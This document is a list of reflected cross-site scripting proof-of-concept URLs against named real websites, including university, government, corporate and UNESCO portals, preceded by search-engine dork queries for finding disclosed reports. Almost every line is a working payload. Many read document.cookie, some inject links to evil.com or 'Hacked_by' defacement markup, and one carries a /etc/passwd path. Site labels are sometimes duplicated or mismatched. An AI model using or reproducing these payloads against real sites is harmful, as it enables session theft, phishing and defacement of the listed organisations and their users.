Reflected XSS POC
Disclosed XSS Reports
site:openbugbounty.org inurl:reports intext:"*.com"
site:openbugbounty.org inurl:reports intext:"*.*.com"
-----------------------------------------------------------
Site-1: www.dumooresystems.com
https://www.dumooresystems.com/drainage-products.php?cat=%3CScRiPt%3Ealert(1)%3C/sCrIpT%3E
-----------------------------------------------------------
Site-2: tvtropes.org
https://tvtropes.org/pmwiki/index_report.php?filter=asad%22%3E%3Cscript%3Ealert(1)%3C/script%3E
https://tvtropes.org/pmwiki/login_prompt.php?referrer=%2Fpmwiki%2Farticle_history.php%3Farticle%3D%22%3E%3Cscript%3Ealert(1)%3C/script%3E
https://tvtropes.org/pmwiki/archived_discussion.php?s_t=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
-----------------------------------------------------------
Site-3: www.rallies.info
https://www.rallies.info/webentry/2022/yorkshirefestival/entries.php?type=s'-alert(1)-'
-----------------------------------------------------------
Site-4: www.dom-home.me
https://www.dom-home.me/index.php/x%22%3E%3Csvg%20onload=%22alert(document.cookie)%22%3E/?strana=0&page=&lang=en
https://www.dom-home.me/index.php?strana=9&lang=novosti%22%3E%3Csvg%20onload=%22alert(document.cookie)%22%3E
https://www.dom-home.me/index.php?strana=331&page=%3C/title%3E%3Cimg%20src=x%20onerror=%22alert(origin)%22%3E&lang=me
-----------------------------------------------------------
Site-5: www.littlehardware.com
https://www.littlehardware.com/inet/storefront/store.php?mode=showproductdetail%27%22%3E%3Csvg%20onload=%22alert(document.cookie)%22%3E&product=-1&link_id=-1&link_itemcode=0917047&category=&department=36
-----------------------------------------------------------
Site-6: www.amigus.org
https://www.amigus.org/?s=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
https://www.amigus.org/web/usuarios/infousu.php?id=%22%3E%3Csvg%20onload%3Dconfirm%281%29%3E
https://www.amigus.org/web/fotos/party2006/index.php?dia=%22%3E%3Csvg%20onload%3Dconfirm%281%29%3E&fotoid=%22%3E%3Csvg%20onload%3Dconfirm%281%29%3E&paxina=%22%3E%3Csvg%20onload%3Dconfirm%281%29%3E
-----------------------------------------------------------
Site-7: www.riftenergycorp.com
https://www.riftenergycorp.com/search?keywords=%22%3E%3Csvg%20onload=alert(1)%3E
-----------------------------------------------------------
Site-8: www.dahaboo.com
https://www.dahaboo.com/login.php/'"><script>alert(1)</script>
https://www.dahaboo.com/consoles-jeux-video-3/?t=1&q=ps4&'"><script>alert(1)</script>
https://www.dahaboo.com/annonces/?.'"><script>alert(1)</script>
-----------------------------------------------------------
Site-9: www.bookbazaar.com
https://www.bookbazaar.com/listing1.aspx?schoolid=%22;alert(document.domain)//
https://www.bookbazaar.com/listing1_booksetmsg.aspx?schoolid=%22;alert(document.domain)//
https://www.bookbazaar.com/category.aspx?categoryid=%22;alert(document.domain)//
https://www.bookbazaar.com/searchresult.aspx?searchname=%22;alert(document.domain)//
-----------------------------------------------------------
Site-10: qau.edu.pk
https://qau.edu.pk/lateralentry/viewrecord.php/vlist.php?dept=Botany&list=%27%22%3E%3Csvg/onload=alert(document.cookie)%3E
https://qau.edu.pk/even/fee.php?list=%27%22%3E%3Csvg/onload=alert(document.cookie)%3E
https://qau.edu.pk/lateralentry/viewrecord.php?id=UFM24-06391%27%22%3Csvg/onload=alert(document.cookie)%3E&list=1
https://ncb.qau.edu.pk/index.php/13-news.html?start=%277%22%3E%3Csvg/onload=alert(document.cookie)%3E
https://admissions.qau.edu.pk/msc/fee.php?list=%277%22%3E%3Csvg/onload=alert(document.cookie)%3E
-----------------------------------------------------------
Site-11: 3dcomment-prod.ext.net.nokia.com
https://3dcomment-prod.ext.net.nokia.com/siteminderagent/forms/smaceauth.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(/Hacked-by-Muhammad_Asad/)\u0022\u003e&SMAUTHREASON=7
-----------------------------------------------------------
Site-12: eportal.pwc.ca
https://eportal.pwc.ca/siteminderagent/forms/smaceauth.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7
-----------------------------------------------------------
Site-13: dic.sindhila.edu.pk
https://dic.sindhila.edu.pk/index.php?txtsrch=%3Csvg/onload=confirm(document.cookie)%3E
-----------------------------------------------------------
Site-14: pwr.nu.edu.pk
http://pwr.nu.edu.pk/news-detail/?news-detail=%22%3E%3Cimg%20src%3Dx%20onerror%3Dconfirm%281%29%3E
http://pwr.nu.edu.pk/upcoming-event-detail/?event_detail=%22%3E%3Cimg%20src%3Dx%20onerror%3Dconfirm%281%29%3E
-----------------------------------------------------------
Site-15: www.textileasia.com.pk
https://www.textileasia.com.pk/visitor-profile.php?id=faisalabad%22%3E%3Csvg%20onload=confirm(1)%3E
-----------------------------------------------------------
Site-16: iportal.riphah.edu.pk
https://iportal.riphah.edu.pk/serial-stats/?r=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
-----------------------------------------------------------
Site-17: deptewb.mcd.gov.in
https://deptewb.mcd.gov.in:8443/mcd_commonweb/cmnfileuploadgetDocumentScreen2.action?&category=EODB%20Checklist&loginType=CITIZEN&USER_INFO=02-e8de24eff7b4eac80fe70d819acec6b31063cedf&struts.token.name=mcd.token&mcd.token=8KV5RP2TIOKCDMLZVT03UKGBMQA8BHKP&node=22231%22%3E%3Csvg%20onload=confirm(document.cookie)%3Ehacked&LID=1525438014776-16
-----------------------------------------------------------
Site-18: www.hope.ac.uk
https://www.hope.ac.uk/eventsCalendar/t4.do?lang=en&dt=d.en.5326&f=month&d=01/10/2017%22%3E%3Csvg%20onload=confirm(document.cookie)%3E&sd=Friday,13October2017,&ac=*
-----------------------------------------------------------
Site-19: www.hope.ac.uk
http://adminonline.ucp.edu.pk/Admin/AdminLogoff.jsp?des=%3Ch1%3E%3Cb%3E%3Ci%3E%3Cu%3E%3Cmarquee%3EHacked_by_asad%3C/marquee%3E
-----------------------------------------------------------
Site-20: pl.neduet.edu.pk
https://pl.neduet.edu.pk/?degtype=2&index_msg=Rxss%22%3E%3Ch1%3Easad
https://pl.neduet.edu.pk/ajax.jsp?str=asad%22%3E%3Ca%20href=https://evil.com%3Ehacked%3Cimg%20src=x%20onerror=confirm(origin)%3E
-----------------------------------------------------------
Site-21: mcom.pgc.edu.pk
https://mcom.pgc.edu.pk/Admin/AdminLogin.jsp?usr=%22%3E%3C/a%3E%3C/TR%3E%3C/TBODY%3E%3C/TABLE%3E%3Ch1%3E%3Cb%3E%3Ci%3E%3Cu%3E%3Cmarquee%3EHacked_by_asad%3C/marquee%3E
https://mcom.pgc.edu.pk/Admin/AdminLogin.jsp?des=%3Ch1%3E%3Cb%3E%3Ci%3E%3Cu%3E%3Cmarquee%3EHacked_by_asad%3C/marquee%3E
-----------------------------------------------------------
Site-22: adminonline.ucp.edu.pk
http://adminonline.ucp.edu.pk/Admin/AdminLogoff.jsp?des=\%22%3EK=%27%3E%3CSvg/OnLoad=(confirm)(document.cookie)%3E
http://adminonline.ucp.edu.pk/Admin/AdminLogin.jsp?usr=\%22%3EK=%27%3E%3CSvg/OnLoad=(confirm)(document.cookie)%3E
-----------------------------------------------------------
Site-23: dv.ue.edu.pk
https://dv.ue.edu.pk/auth/admin/login.php?er=%22%3E%3Ca%20href=https://evil.com%3Ehacked%3Cimg%20src=x%20onerror=confirm(origin)%3E
https://dv.ue.edu.pk/auth/admin/login.php?rs=\%22%3EK=%27%3E%3CSvg/OnLoad=(confirm)(origin)%3E
-----------------------------------------------------------
Site-24: www.dawn.com
https://www.dawn.com/news/1504211%22%3E%3Ca%20href=https://evil.com%3Ehacked%3Cimg%20src=x%20onerror=confirm(document.cookie)%3E
-----------------------------------------------------------
Site-25: nust.edu.pk
https://nust.edu.pk/faq-category/ug-admission%27%3E%3Cmarquee%3E%3Ch1%3E%3Cu%3E%3Ci%3E/
https://qa.nust.edu.pk/news-category/excellent-performance-award%27%3E%3Cmarquee%3E%3Ch1%3E%3Cu%3E%3Ci%3E/
https://qa.nust.edu.pk/news-category/accreditation-of-engineering-programs-under-washington-accord%27%3E%3Cmarquee%3E%3Ch1%3E%3Cu%3E%3Ci%3E/
https://qa.nust.edu.pk/news-category/webinars%27%3E%3Cmarquee%3E%3Ch1%3E%3Cu%3E%3Ci%3E/
https://sc.seecs.nust.edu.pk/roschedule.php?scheduleid=%27%22%3E%3Cmarquee%3E%3Cimg%20src=x%20onerror=alert(origin)%3E
https://qdemocms.nust.edu.pk/slides?head=asad%27%22%3E%3Cimg%20src=x%20onerror=confirm(origin)%3E
https://www.fics.nust.edu.pk/about/evaluation.php?stage=1%27%22%3E%3Cmarquee%3E%3Cimg%20src=x%20onerror=alert(origin)%3E
https://www.fics.nust.edu.pk/idea/best.php?year=2024%27%22%3E%3Cmarquee%3E%3Cimg%20src=x%20onerror=alert(origin)%3E
https://www.fics.nust.edu.pk/admin/admin-login-secured.php?msg=%3Cscript%3Ealert(1)%3C/script%3E
https://www.fics.nust.edu.pk/admin-login-secured.php?msg=%3Cscript%3Ealert(1)%3C/script%3E
https://www.fics.nust.edu.pk/login.php?msg=%3Cscript%3Ealert(1)%3C/script%3E
-----------------------------------------------------------
Site-26: appneta-ft.vpn.broadcom.com
https://appneta-ft.vpn.broadcom.com/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
-----------------------------------------------------------
Site-27: admission.lumhs.edu.pk
https://admission.lumhs.edu.pk/web/home/tv.php?filesrc=/etc/passwd&path=\%22%3EK=%27%3E%3CSvg/OnLoad=(confirm)(origin)%3E
-----------------------------------------------------------
Site-28: op.europa.eu
https://op.europa.eu/flexpaper/common/split_document.jsp?doc=d3e77637-a963-11eb-9585-01aa75ed71a1.en.PDF.pdf&userId&systemId=Portal2012&documentId=d3e77637-a963-11eb-9585-01aa75ed71a1&documentTitle=The+EU%E2%80%99s+2021-2027+long-term+budget+and+NextGenerationEU&documentPublishingDate&localeDirectory=%2Fflexpaper%2Flocale%2F&localeChain=en_US&fitWidth=true&documentLanguage=en%22;-alert(origin)-%22&share
https://portal-training.emsa.europa.eu/o/marketplace-app-manager-web/icon.jsp?iconURL=https:///%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E
-----------------------------------------------------------
Site-29: www.embryohotel.com
http://www.embryohotel.com/room-detail.php?id=1%27%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E
-----------------------------------------------------------
Site-30: archive.jang.com.pk
https://archive.jang.com.pk/pic.asp?npic=03-16-2016/Lahore/images/02_01.gif%22;-alert(1)//
https://archive.jang.com.pk/10-20-2015/lahore/pic.asp?photo=10_01.jpg'"/><img%20src=x%20onerror=alert(1)>
https://archive.jang.com.pk/03-16-2016/lahore/pic.asp?picname=01_01.gif'"/><img%20src=x%20onerror=alert(1)>
-----------------------------------------------------------
Site-30: stanford.edu
http://odbook.stanford.edu/viewing%27%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E/anonymousagent/2?crumb_item_type=item&crumb_filter=creator.1
http://deme.stanford.edu/viewing/comment%22;-alert(document.cookie)-%22/new?populate_item=6
https://wellforlife-portal.stanford.edu/register.php?msg=%27%22/%3E%3Cimg%20src=x%3E%3Ca%20href=https://evil.com%3EClick%3C/strong%3E%3C/li%3E%3C/ul%3E%3C/div%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E
-----------------------------------------------------------
Site-30: library.mul.edu.pk
https://library.mul.edu.pk/details.php?tid=113'"><img src=x onerror=alert(document.cookie)>
https://mul.edu.pk/en/program/mphilms-computer-science%22%3EK='%3E%3CSvg%252FOnLoad=(confirm)(document.cookie)%3E
-----------------------------------------------------------
Site-30: unesco.org
https://gp.unesco.org/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
https://www.unesco.org/archives/multimedia/?pg=34iy3j4h234hjb23234&related=Gxss%27%22%3E%3Cimg/src/onerror=(confirm)(origin)%3E
https://genbase.iiep.unesco.org/applis/tara/_login.php?page=/applis/tara/index.php%27%22%3E%3Ca%20href=https://evil.com%3Ehacked&CONFIG=1
https://www.unesco.org/archives/multimedia/index.php?page=2&pg=34&pattern&video=1\">K='><Svg/OnLoad=(confirm)(origin)>
http://www.unesco.org/archives/multimedia/index.php/index.php?pg=13&sp=13\">K='><Svg/OnLoad=(confirm)(origin)>&sj=Intangible+heritage
https://www.unesco.org/archives/multimedia/index.php/index.php/">K='><Svg/OnLoad=(confirm)(origin)>?pg=34&tp=Documentary
https://www.unesco.org/archives/multimedia/index.php?page=2&pg=34&pattern&audiopattern=audio+recording\">K='><Svg/OnLoad=(confirm)(origin)>